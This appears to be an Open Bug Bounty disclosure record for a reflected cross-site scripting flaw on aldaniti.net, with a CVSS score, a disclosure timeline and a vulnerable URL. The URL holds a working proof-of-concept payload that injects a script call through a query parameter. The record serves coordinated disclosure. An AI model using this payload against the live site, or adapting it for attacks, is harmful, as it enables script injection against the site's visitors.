Lucene search
OmniGoochOBB:437798HistoryNov 27, 2017 - 1:33 a.m.
aldaniti.net XSS vulnerability
2017-11-2701:33:00
OmniGooch
www.openbugbounty.org
11
Open Bug Bounty ID: OBB-437798
| Description | Value |
|---|---|
| Affected Website: | aldaniti.net |
| Vulnerable Application: | Custom Code |
| Vulnerability Type: | XSS (Cross Site Scripting) / CWE-79 |
| CVSSv3 Score: | 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] |
| Remediation Guide: | OWASP XSS Prevention Cheat Sheet |
Vulnerable URL:
http://www.aldaniti.net/wingames/////index.php?pk_campania=MjM5MjU=k9x&25450";prompt(/XSSposed/)//1=2
Coordinated Disclosure Timeline
| Description | Value |
|---|---|
| Vulnerability Reported: | 27 November, 2017 01:33 GMT |
| Vulnerability Verified: | 27 November, 2017 01:36 GMT |
| Website Operator Notified: | 27 November, 2017 01:36 GMT |
| Vulnerability Published: | 27 November, 2017 01:36 GMT[without any technical details] |
| Public Disclosure: | 25 February, 2018 01:33 GMT |